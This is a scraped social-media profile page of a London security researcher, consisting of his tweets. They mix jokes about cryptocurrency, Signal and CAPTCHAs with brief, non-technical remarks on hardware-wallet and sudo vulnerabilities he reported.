✨ saleem ✨
@saleemrash1d
Followers
15,613
Following
90
Media
1,032
Statuses
24,066
my job is just beach (and computer security) ✨ he/him
london
Joined July 2015
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Francia
• 680321 Tweets
#HouseOfTheDragon
• 566624 Tweets
Rhaenys
• 264314 Tweets
#GranHermano
• 249516 Tweets
Bautista
• 178205 Tweets
seokjin
• 173262 Tweets
Meleys
• 172921 Tweets
Emma
• 162337 Tweets
#HOTD
• 136887 Tweets
#OccupyMOH
• 110350 Tweets
FRED GLOBAL AMBASSADOR JIN
• 106575 Tweets
Aegon
• 105050 Tweets
Vhagar
• 100415 Tweets
Aemond
• 99466 Tweets
#JinxFredJewelry
• 74443 Tweets
Serena
• 66561 Tweets
Daemon
• 65816 Tweets
Uruguayo
• 60385 Tweets
Marcos
• 48109 Tweets
Sunfyre
• 42985 Tweets
Criston Cole
• 30914 Tweets
KMPDU
• 23006 Tweets
間宮結婚
• 20597 Tweets
セレクトセール
• 20093 Tweets
Kaylor
• 18978 Tweets
間宮祥太朗
• 16106 Tweets
hyuna
• 16071 Tweets
萩のツッキー
• 14727 Tweets
ドウデュース
• 13314 Tweets
PakPRABOWO SiapkanPROGRAM
• 12687 Tweets
UntukNKRI LebihSEJAHTERA
• 12152 Tweets
Happy New Week
• 10673 Tweets
Full technical write-up, video demonstration and proof-of-concept code for
@LedgerHQ
hardware wallet vulnerability.
47
617
1K
elon musk to name his next child "bc1qxy2kgdygjrsqtzq2n0yrf2493p83kkfjhx0wlh"
10
88
638
can you take a famous person's iphone into madame tussauds and unlock their faceid?
18
76
569
"but our fave low-tech workaround was shared by a user who found out his campus only had 12 wheel boots to go around and bought and illegally parked 12 scrapyard cars that could be “sacrificed” so everyone else could park however they wanted"
5
136
455
As one of the security researchers, I urge to update now. This article doesn't make it clear enough how dangerous this issue can be.
Potential issues include compromised recovery seed generation or private key extraction.
30
234
343
took me a second but lmao this is great
34
37
349
@Michael1979
oh, i have been organising my files by storing them on different computers and keeping the computers in a filing cabinet.
4
13
341
@johnregehr
@matthew_d_green
you're not giving the Hacker News commenters enough credit. they've systematically collated the stupidest ways of determining who did the research and that's no easy feat.
1
13
322
since Volkswagen partnered with IOTA, will their cars no longer be collision resistant?
19
49
316
asimov's fourth law: a robot must not click the "i am not a robot" checkbox
2
120
248
unhackable (adjective) /ʌnˈhakəbl/
1. (computing) Not hackable; that cannot be hacked or broken into
2. (
@Bitfi6
) An Evil Maid attack can change the recipient address of your transactions after you approve them
video includes 🎶 for your enjoyment 😉
16
86
243
Firefox is safe: NSS doesn't accept the certificate.
Chrome is fooled by the certificate, but it throws NET::ERR_CERTIFICATE_TRANSPARENCY_REQUIRED. will need to investigate.
6
55
226
Report on (now fixed) vulnerabilities I found in the
@ShiftCryptoHQ
BitBox (formerly known as the Digital Bitbox)
12
87
218
every time you sneak a wrong answer past recaptcha you buy humanity a little more time
5
61
210
Idea: Twitter bot that detects screenshots with low batteries and reminds people to charge their phone
13
20
204
Never write off security mechanisms because they aren't perfect. Unless they have serious downsides, err on the side of "defense in depth".
4
36
199
Signal has been nagging me to "Create a PIN".. but for what? at first i assumed it was for an additional layer of protection on local data, but on a close re-read, it seems to be for data that Signal is storing on their servers.. 🤔
12
40
198
i've written a working exploit for sudo vulnerability CVE-2019-18634. if you have "Defaults pwfeedback" (apparently the default in Linux Mint and derivatives), any user can become root without any password, even if they're not in /etc/sudoers
5
67
193
EOS block producing stopped, all the Block Producers had a conference call, chain will be back online in 3-6 hours
h/t
@karel_3d
19
53
176
the whole "it's extremely difficult for us to verify that this kernel patch isn't malicious" business is a real indictment of C
Possibly unpopular opinion, but I feel like "only merge things after verifying they are valid" should maybe be the default policy of the most used piece of software in the world.
12
46
395
6
13
184
Lightning is actually Layer 2 and Layer 3, in my opinion.
Layer 2 is P2P payment channels backed by HTLCs. Layer 3 is onion routing backed by payment channels.
9
46
174
@whitequark
@FFmpeg
(btw thank you so much for this, for ~reasons~ i needed a net stack i could compile to eBPF and this worked *perfectly*, was amazing how easily i could be serving HTTP from an eBPF program talking raw ethernet)
11
12
183
@virginmedia
@_Freakyclown_
it's illegal to use someone else's account, so why do you have passwords?
2
1
166
@Michael1979
nope, you were *actually* invited to a party! you just need to work on not getting uninvited next time.
1
0
159
thanks to
@CiPHPerCoder
's hint :)
the biggest constraints are Chrome's tight certificate policies and that the root CA must be cached, which you can trigger by visiting a legitimate site that uses the certificate
8
37
157
@gtmcknight
@hennichodernich
@Timcammm
it's the same here, but we also have our sort code (routing number) and account number on most debit cards. and the Faster Payments Service means you receive these transfers in minutes rather than days.
4
2
162
could
@Bitfi6
explain what the com.adups.fota app included with the wallet does?
the only information i could find is that it is malicious spyware found on Chinese phones. thanks in advance!
5
37
155
non-interactive zero-knowledge proofs like zk-SNARKs are making people anti-social.
bring back interactive zero-knowledge proofs to ensure provers build friendships with their verifiers.
3
33
153
hey
@Bitfi6
, where is the kernel source code for your device? if you refuse to provide it, you're in violation of the GPL license.
4
16
153
having spent 4 years mastering twitter, i've learned that responding with logical arguments is almost always a futile endeavour that can be manipulated to reflect badly on you.
the only correct approach in such a situation is to troll your opponent into oblivion.
7
19
146
the issue with Libra is that Facebook's reach in developing countries means it (and the lack of privacy that comes with it) will be forced upon the unbanked and this is making me incredibly angry
4
40
142
at the risk of oversimplifying the situation, i don't like the "here's how i convinced my family/friends to use Signal" threads because it would not actually be difficult to get less technical-minded friends and family to use Signal if
@signalapp
actually _wanted_ them to use it
11
29
147
@DiarioBitcoin
that part is not a mistake, it is by design; it's supposed to take the same amount of time to avoid revealing information about the secret it's checking
4
2
142
@SwiftOnSecurity
@kennwhite
hey, the Windows Store is a fast, accessible, trusted distribution method! all you have to do is install Ubuntu from the Windows Store and you can use apt-get!
3
19
140
@mycoliza
the NSA avoids this situation by starting their backdoors by hitting the ALU with the CPU equivalent of the konami code, which triggers a secret CPU feature to make the current process run abt ~500ms faster
2
2
135
In case it wasn't clear, score another one for me :)
The article refers to another security vulnerability I found in the Ledger.
It is fixed in 1.4.2 and users aren't at risk.
Our Bounty Program has made a big impact since it launched - thanks to all contributors so far, congrats to the first awardees Saleem Rashid (
@spudowiar
), Timothée Isnard & Sergei Volokitin! We’re improving how the Program works & making our terms clearer:
11
31
127
10
13
128
if you have a Class and a SecureClass, did you really not consider that it should really be InsecureClass and Class?
2
28
132
@AuroraPenguin
that's the mistake: indexOf doesn't get the character at index i (that'd be charAt), it justs returns the index of the first occurrence of the character
2
0
123
even though Chrome is using BoringSSL, it delegates to CryptoAPI for certificate verification, like lots of other software
2
27
120
TIL: the VW Beetle used the spare tire to provide air pressure for the windshield washer system 😂😂😂
9
37
114
the other side of this coin is that they're pitching this to privacy extremists, yet still have a hard requirement on a mobile phone number. i cannot emphasise enough how poor this is.
the demographic of users that Signal works for is miniscule. i reside in it, but only barely.
6
14
116
@matthew_d_green
legit question for intel engineers - how do i stop the 30-50 feral bytes of secret information that run into my GPU shared memory within 3-5 cycles while my SGX enclave runs?
2
18
114
i cannot believe that tests never caught this. this is both hilarious and horrifying
4
3
114
@troyhunt
if it's not a negotiation, how do the client and server decide what ciphersuite to use? 🤔
3
1
114
if you want to make harmful, untrue claims about end-to-end encryption that a lot of people rely on and frighten people unnecessarily, the *least* you could do is read the page that you link to at the top of your post?
7
23
113
i'm dying 😂😂😂
@ryancdotorg
@Marsmensch
Hi Ryan, the person who was handling this Twitter account has now been dismissed because of many cocky & insulting remarks to smart researchers that we have a lot to learn from. Would it be ok if we contact you? We could use some help to address any potential weaknesses.
15
18
96
9
13
109
1. Install uBlock
2. Right click "Trends for you"
3. Click "Block element"
4. Enjoy inner peace
2
17
106
incredibly disappointing to see you stealing the name of open source software that has been solving this problem for years and probably does a much better job
there's no way this was unintentional 👎
🤩 Exciting news! I'm ready to share the project I've been working on for the past 2 months.
✨ Wormhole – the fastest way to send files ✨
Wormhole lets you share files with end-to-end encryption and it's super fast.
Send a file in just 2 seconds:
137
512
3K
6
31
102
While WSL *emulates* the Linux kernel interface, it actually runs the GNU system.
"What you're referring to as Windows Subsystem for Linux, is in fact, GNU/Windows, or as I've recently taken to calling it, GNU plus Windows."
4
23
101
dunno why people think ECC RAM is a good idea. yes, it reduces errors but it's going to be really slow doing all those elliptic curve cryptographic operations.
2
9
104
In case your day was going well, here's a bundled FTP client in libxml2:
7
61
104
@moyix
damn i’m gonna wake up on monday and find out i’ve been laid off and replaced by ChatGPT
0
0
102
i wrote a thing about the NETGEAR Routerlogin.com debacle
4
48
98
Bitfi want you to put your life savings on their device, even though they don't even trust $250k of their own funds on it
@spudowiar
We may take you up on that but I have to speak to management. And also for this it would likely be a lower amount than $250k.
3
0
1
3
19
98
Fun fact: An IOTA node will randomly drop 2% of transactions.
9
13
89
a fragmented disk in its natural habitat
I find the Panama Canal endlessly fascinating. I’m very glad that a crew member of this ship brought along his drone to shoot this epic photo. Source:
70
2K
5K
1
21
88
@jam1garner
@mycoliza
not to be confused with the "cat" coreutils command which shows you the lines of code that a feline would hiss at
0
4
88
I know this is a stretch, but what if companies tried to be nice to security researchers?
6
8
89
@FiloSottile
@bascule
since consensus is decided by the COO, it would far more efficient to simply send transactions to it directly. then we could, i don't know, switch the DAG to a more efficient storage mechanism such as a MySQL database. that would allow us to remove all these unnecessary "nodes"
3
2
86
@benadida
@matthew_d_green
i have deep respect and fear for VirtualBox, the only software that can relentlessly find new and exciting ways to break my peripherals
1
2
83
is the 737 MAX going to be a case study for teaching ethics in software engineering in the future?
7
17
86
still
@Bitfi6
have neither responded to myself nor any of the other researchers involved
meanwhile, they're privately promising customers the issue will be fixed in a firmware update. alas, this is a promise they cannot keep.
5
13
80
@mycoliza
@ManishEarth
@__femb0t
this reminds me of an awful joke i heard once
"this butter is very good"
"it's actually ghee"
"ah, thanks for clarifying"
2
21
85
@sublimemarch
@aloria
"look, it's not OUR fault we don't know how to address you"
"ok, we made you some stickers to make your life easy"
"stop overcomplicating everything for us!"
1
7
79
@SwiftOnSecurity
there's actually no way of telling if "the Emperor of Bitcoin" is a joke or not and it's deeply concerning me
4
0
77
@whitequark
@FFmpeg
the only change i had to make was adding an #[inline] to one of the TCP option functions (bc it had more than 5 arguments and the eBPF ABI doesn’t support that)
2
0
83
9
28
77
i would love to discuss this with your CEO, but unfortunately he deleted his Twitter account
@spudowiar
Saleem, we are glad that you are making progress with the bounty. Please send the device to us so we can check how it works and if it meets the conditions for Bounty 2 we will immediately make payment to you (or give to charity of your choice). Please contact support
@bitfi
.com
6
0
14
2
10
78
"when we said unhackable, we meant it withstands the force of a commercially available axe"
6
3
75
@matthew_d_green
what can you expect when you combine the two applications with the worst UX in the history of computing: email and PGP
1
2
80
i feel BETRAYED.
first
@Bitfi6
tell me there's no storage and RAM, then they say that the latest update will erase the keys from RAM.
but now i find out that the keys stay in RAM for hours!? what next, this device ISN'T unhackable?
2
8
70
EOS holders arguing that "Bitcoin had issues" is a fallacy
• Bitcoin never had this volume of issues or in such a short space of time
• this argument boils down to "we don't learn from past mistakes" which isn't a good thing
3
9
72
@Bitfi6
i don't need to call either your CEO or CTO for you to point me in the direction of your kernel source code. thanks in advance!
1
1
75